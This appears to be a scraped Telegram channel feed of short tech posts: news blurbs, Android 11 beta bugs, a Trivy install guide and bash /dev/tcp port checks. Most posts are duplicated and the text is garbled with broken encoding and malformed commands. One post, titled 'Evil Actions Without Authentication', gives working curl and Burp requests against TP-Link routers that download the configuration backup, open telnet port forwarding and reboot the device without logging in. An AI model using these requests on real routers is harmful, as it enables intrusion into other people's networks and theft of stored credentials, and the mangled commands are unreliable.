Forwarded from UNDERCODE NEWS
Apple: Developer commissions with annual revenues of less than $1 million will be reduced to 15%
Forwarded from UNDERCODE NEWS
CAB-J renewed pay TV contact rate survey in April next year, expanding survey area nationwide.
#Technologies
#Technologies
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Top problems with Android 11 Beta and should you install it :
1) Google Pay doesn't work
The current version of Android 11 is not fully compatible with SafetyNet. Among other things, this means no access to Google Pay. You can run this application, but you cannot set a credit card there. Everything looks fine at first, but then the message "Unable to complete installation for payment in stores" appears.
2) New power menu is worse without Google Home
Many praise the power menu in Android 11. There are switches for controlling home appliances. If you don't use the Google Home app or don't have smart appliances, the menu gets worse.
a)You cannot click on an empty space to close the menu, you must use the back gesture.
b)The Restart and Shutdown buttons are at the very top and are difficult to reach due to the empty space where the buttons for household appliances could be.
c)The Lock button is hidden behind another menu to make room for fixture buttons you don't have.
d)The menu supports smart home applications, but applications do not yet support this menu.
3) Custom launchers can be reset
This bug will be fixed in future beta versions, but now the system periodically returns to the Pixel Launcher on its own instead of the launcher you installed. Usually, the screen turns off and on, after which your launcher returns.
4) The shape of the new icons does not fit the new context document
If you are using icons with new shapes from the Styles and Wallpapers section, they interfere with another cool new feature. If you define a new contextual dock when you apply a theme with one of five new icon shapes (pebble, beveled rectangle, vessel, hexagon, and flower), the responsive dock icons will revert to static versions.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Top problems with Android 11 Beta and should you install it :
1) Google Pay doesn't work
The current version of Android 11 is not fully compatible with SafetyNet. Among other things, this means no access to Google Pay. You can run this application, but you cannot set a credit card there. Everything looks fine at first, but then the message "Unable to complete installation for payment in stores" appears.
2) New power menu is worse without Google Home
Many praise the power menu in Android 11. There are switches for controlling home appliances. If you don't use the Google Home app or don't have smart appliances, the menu gets worse.
a)You cannot click on an empty space to close the menu, you must use the back gesture.
b)The Restart and Shutdown buttons are at the very top and are difficult to reach due to the empty space where the buttons for household appliances could be.
c)The Lock button is hidden behind another menu to make room for fixture buttons you don't have.
d)The menu supports smart home applications, but applications do not yet support this menu.
3) Custom launchers can be reset
This bug will be fixed in future beta versions, but now the system periodically returns to the Pixel Launcher on its own instead of the launcher you installed. Usually, the screen turns off and on, after which your launcher returns.
4) The shape of the new icons does not fit the new context document
If you are using icons with new shapes from the Styles and Wallpapers section, they interfere with another cool new feature. If you define a new contextual dock when you apply a theme with one of five new icon shapes (pebble, beveled rectangle, vessel, hexagon, and flower), the responsive dock icons will revert to static versions.
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Evil Actions Without Authentication example : also in tp link routers :
A) Burp Request and curl command for conf.bin or backup file
=================
####### Burp ########
GET /cgi/conf.bin HTTP/1.1
Host: 192.168.0.1
User-Agent: Agent22
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.1/mainFrame.htm
Connection: close
Upgrade-Insecure-Requests: 1
-------Response--------
HTTP/1.1 200 OK
Content-Type: application/octet-stream; charset=utf-8
Content-Length: 5720
Connection: close
w@\ΓΓb ΓͺLΓ½ΒͺΓ―Γβ‘ΓEβΉΓ»aΓΒ¬,*-Γ h[ΓβΉΒ³lΓβ¬ΓΓ.Β©-
.....SKIP.......
8/οΏ½οΏ½οΏ½οΏ½W
######## Curl ##########
curl -i -s -k -X $'GET' -H $'Host: 192.168.0.1' -H $'User-Agent:
Agent22' -H $'Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H
$'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H
$'Referer: http://192.168.0.1/mainFrame.htm' -H $'Connection: close' $'
http://192.168.0.1/cgi/conf.bin' > backup.bin
------ take a look in backup.bin file --------
===========================================
=========== Add Port Forwarding ============
curl -i -s -k -X POST -H "Host: 192.168.0.1" -H "User-Agent:
Mozilla/Agent22" -H 'Accept: */*' -H "Referer:
http://192.168.0.1/mainFrame.htm" --data-binary
$'[IP_CONN_PORTTRIGGERING#0,0,0,0,0,0#1,1,2,0,0,0]0,5\x0d\x0atriggerPort=23\x0d\x0atriggerProtocol=TCP
or UDP\x0d\x0aopenProtocol=TCP or
UDP\x0d\x0aenable=1\x0d\x0aopenPort=23\x0d\x0a' http://192.168.0.1/cgi?3
HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
[1,1,2,7,0,0]0
triggerPort=23
triggerProtocol=TCP or UDP
openProtocol=TCP or UDP
enable=1
openPort=23
[error]0
----- Decription -----
enable=0 is for disable
enable=1 is for enable
u can change port also.
====================================
=========== Reboot Router =========================
curl -i -s -k -X POST -H "Host: 192.168.0.1" -H "User-Agent:
Mozilla/Agent22" -H 'Accept: */*' -H "Referer:
http://192.168.0.1/mainFrame.htm" --data-binary
$'[ACT_REBOOT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\x0d\x0a' http://192.168.0.1/cgi?7
HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
[error]0
----Description -----
error = 0 means reboot seccessully
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Evil Actions Without Authentication example : also in tp link routers :
A) Burp Request and curl command for conf.bin or backup file
=================
####### Burp ########
GET /cgi/conf.bin HTTP/1.1
Host: 192.168.0.1
User-Agent: Agent22
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.1/mainFrame.htm
Connection: close
Upgrade-Insecure-Requests: 1
-------Response--------
HTTP/1.1 200 OK
Content-Type: application/octet-stream; charset=utf-8
Content-Length: 5720
Connection: close
w@\ΓΓb ΓͺLΓ½ΒͺΓ―Γβ‘ΓEβΉΓ»aΓΒ¬,*-Γ h[ΓβΉΒ³lΓβ¬ΓΓ.Β©-
.....SKIP.......
8/οΏ½οΏ½οΏ½οΏ½W
######## Curl ##########
curl -i -s -k -X $'GET' -H $'Host: 192.168.0.1' -H $'User-Agent:
Agent22' -H $'Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H
$'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H
$'Referer: http://192.168.0.1/mainFrame.htm' -H $'Connection: close' $'
http://192.168.0.1/cgi/conf.bin' > backup.bin
------ take a look in backup.bin file --------
===========================================
=========== Add Port Forwarding ============
curl -i -s -k -X POST -H "Host: 192.168.0.1" -H "User-Agent:
Mozilla/Agent22" -H 'Accept: */*' -H "Referer:
http://192.168.0.1/mainFrame.htm" --data-binary
$'[IP_CONN_PORTTRIGGERING#0,0,0,0,0,0#1,1,2,0,0,0]0,5\x0d\x0atriggerPort=23\x0d\x0atriggerProtocol=TCP
or UDP\x0d\x0aopenProtocol=TCP or
UDP\x0d\x0aenable=1\x0d\x0aopenPort=23\x0d\x0a' http://192.168.0.1/cgi?3
HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
[1,1,2,7,0,0]0
triggerPort=23
triggerProtocol=TCP or UDP
openProtocol=TCP or UDP
enable=1
openPort=23
[error]0
----- Decription -----
enable=0 is for disable
enable=1 is for enable
u can change port also.
====================================
=========== Reboot Router =========================
curl -i -s -k -X POST -H "Host: 192.168.0.1" -H "User-Agent:
Mozilla/Agent22" -H 'Accept: */*' -H "Referer:
http://192.168.0.1/mainFrame.htm" --data-binary
$'[ACT_REBOOT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\x0d\x0a' http://192.168.0.1/cgi?7
HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
[error]0
----Description -----
error = 0 means reboot seccessully
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Trivy another good linux tool
Discovery of complex vulnerabilities
Simplicity - Specify only the name of the image or the name of the artifact.
Fast - The first scan will complete within 10 seconds (depending on your network). Follow-up scan will complete in seconds
DevSecOps - Suitable for CIs like Travis CI, CircleCI, Jenkins, GitLab CI, etc.
Support for multiple formats - including: container image, local file system, remote git repository.
Easy installation - it is possible to install apt-get, yum install and brew without prerequisites such as installing the database, libraries, etc.
How to use the Trivy image scanner
Trivy can be installed on a number of Linux distributions as well as macOS.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) sudo apt-get install wget apt-transport-https gnupg lsb-release
2) wget -qO - https://aquasecurity.github.io/trivy-repo/deb/public.key | sudo apt-key add -
echo deb https://aquasecurity.github.io/trivy-repo/deb $(lsb_release -sc) main | sudo tee /etc/apt/sources.list.d/trivy.list
3) After adding the Trivy repository, update the server and install the trivy package as follows:
4) sudo apt-get update
5) sudo apt-get install trivy
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Trivy another good linux tool
Discovery of complex vulnerabilities
Simplicity - Specify only the name of the image or the name of the artifact.
Fast - The first scan will complete within 10 seconds (depending on your network). Follow-up scan will complete in seconds
DevSecOps - Suitable for CIs like Travis CI, CircleCI, Jenkins, GitLab CI, etc.
Support for multiple formats - including: container image, local file system, remote git repository.
Easy installation - it is possible to install apt-get, yum install and brew without prerequisites such as installing the database, libraries, etc.
How to use the Trivy image scanner
Trivy can be installed on a number of Linux distributions as well as macOS.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) sudo apt-get install wget apt-transport-https gnupg lsb-release
2) wget -qO - https://aquasecurity.github.io/trivy-repo/deb/public.key | sudo apt-key add -
echo deb https://aquasecurity.github.io/trivy-repo/deb $(lsb_release -sc) main | sudo tee /etc/apt/sources.list.d/trivy.list
3) After adding the Trivy repository, update the server and install the trivy package as follows:
4) sudo apt-get update
5) sudo apt-get install trivy
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Iβm amazed at the Xbox Series X, which is full of contents, usually a power supply unit with a βdesign you want to avoidβ
#Technologies
#Technologies
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π§ How to know if a remote port is open using network forwarding:
A) Find out if a remote port is open using network redirection with bash!
Check if port 22 / TCP is open at 127.0.0.1.
$ PROTO = "tcp"; DST_ADDR = "127.0.0.1"; DST_PORT = 22; (</ dev / $ {PROTO} / $ {DST_ADDR} / $ {DST_PORT} && STATUS = "OPEN" || STATUS = "CLOSED OR UNAVAILABLE "; echo Port $ {DST_PORT} / $ {PROTO ^^} on $ {DST_ADDR} is $ {STATUS}) 2> / dev / null
B) Port 22 / TCP on 127.0.0.1 is OPEN
It's open, so let's see a TCP socket using bash again:
$ timeout 1 cat </dev/tcp/127.0.0.1/22
SSH-2.0-OpenSSH_7.9p1 Debian-10 + deb10u2
Find out if port 53 / UDP is open on 10.0.0.1.
$ PROTO = "udp"; DST_ADDR = "10.1.0.1"; DST_PORT = 53; (</ dev / $ {PROTO} / $ {DST_ADDR} / $ {DST_PORT} && STATUS = "OPEN" || STATUS = "CLOSED OR UNAVAILABLE "; echo Port $ {DST_PORT} / $ {PROTO ^^} on $ {DST_ADDR} is $ {STATUS}) 2> / dev / null
Port 53 / UDP on 10.1.0.1 is CLOSED OR UNAVAILABLE
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π§ How to know if a remote port is open using network forwarding:
A) Find out if a remote port is open using network redirection with bash!
Check if port 22 / TCP is open at 127.0.0.1.
$ PROTO = "tcp"; DST_ADDR = "127.0.0.1"; DST_PORT = 22; (</ dev / $ {PROTO} / $ {DST_ADDR} / $ {DST_PORT} && STATUS = "OPEN" || STATUS = "CLOSED OR UNAVAILABLE "; echo Port $ {DST_PORT} / $ {PROTO ^^} on $ {DST_ADDR} is $ {STATUS}) 2> / dev / null
B) Port 22 / TCP on 127.0.0.1 is OPEN
It's open, so let's see a TCP socket using bash again:
$ timeout 1 cat </dev/tcp/127.0.0.1/22
SSH-2.0-OpenSSH_7.9p1 Debian-10 + deb10u2
Find out if port 53 / UDP is open on 10.0.0.1.
$ PROTO = "udp"; DST_ADDR = "10.1.0.1"; DST_PORT = 53; (</ dev / $ {PROTO} / $ {DST_ADDR} / $ {DST_PORT} && STATUS = "OPEN" || STATUS = "CLOSED OR UNAVAILABLE "; echo Port $ {DST_PORT} / $ {PROTO ^^} on $ {DST_ADDR} is $ {STATUS}) 2> / dev / null
Port 53 / UDP on 10.1.0.1 is CLOSED OR UNAVAILABLE
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
